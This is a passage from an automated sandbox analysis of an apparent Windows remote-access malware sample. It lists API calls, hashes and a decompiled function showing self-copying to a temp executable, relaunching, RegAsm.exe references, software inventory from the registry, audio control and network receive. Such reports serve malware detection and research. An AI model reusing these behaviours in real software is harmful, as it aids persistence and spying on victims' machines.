                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: f4826861e5298439744646951860ce9fb7ab057ff257c0e16f58e1680acdb359
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: f4826861e5298439744646951860ce9fb7ab057ff257c0e16f58e1680acdb359
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                  0x00411d8a
                                  0x00411d9b
                                  0x00411da9
                                  0x00411dae
                                  0x00411dbb
                                  0x00411dc0
                                  0x00411dc7
                                  0x00411dd0
                                  0x00411dd0
                                  0x00411dd9
                                  0x00411de4
                                  0x00411f46
                                  0x00411f55
                                  0x00000000
                                  0x00411f5b
                                  0x00411f69
                                  0x00411f79
                                  0x00411f79
                                  0x00411dea
                                  0x00411dea
                                  0x00411df9
                                  0x00411dff
                                  0x00411e04
                                  0x00411e07
                                  0x00411e24
                                  0x00411e2d
                                  0x00411e36
                                  0x00411e3a
                                  0x00411e43
                                  0x00411e47
                                  0x00411e50
                                  0x00411e54
                                  0x00411e5f
                                  0x00411e68
                                  0x00411e71
                                  0x00411e7a
                                  0x00411e86
                                  0x00411e8d
                                  0x00411ea1
                                  0x00411eb1
                                  0x00411ec1
                                  0x00411ecb
                                  0x00411ed3
                                  0x00411ed8
                                  0x00411ede
                                  0x00411ee4
                                  0x00411eee
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411efc
                                  0x00411f06
                                  0x00411f08
                                  0x00411f08
                                  0x00411f1a
                                  0x00411f1c
                                  0x00411f21
                                  0x00411f24
                                  0x00411f24
                                  0x00411f26
                                  0x00411f2a
                                  0x00000000
                                  0x00000000
                                  0x00411f2e
                                  0x00411f42
                                  0x00411f42
                                  0x00411f30
                                  0x00411f30
                                  0x00411f33
                                  0x00411f38
                                  0x00000000
                                  0x00411f3a
                                  0x00411f3b
                                  0x00411f3d
                                  0x00411f40
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411f40
                                  0x00411f38
                                  0x00000000
                                  0x00411f2e
                                  0x00411f83
                                  0x00411f85
                                  0x00411f88
                                  0x00411f8a
                                  0x00411f92
                                  0x00411f92
                                  0x00411fab
                                  0x00411fb3
                                  0x00411fb9
                                  0x00411fb9
                                  0x00411fbf
                                  0x00411ede
                                  0x00411fd3
                                  0x00411fdd
                                  0x00411fed
                                  0x00411ffd
                                  0x00412005
                                  0x00412005
                                  0x0041200e
                                  0x00412018

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                  • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                  • API String ID: 1753768752-1354618412
                                  • Opcode ID: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                  • Opcode Fuzzy Hash: 765aabc8db0142e62955e7b1a7793da8d9cfa88518039bab73f2148d12eff53b
                                  • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                  • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
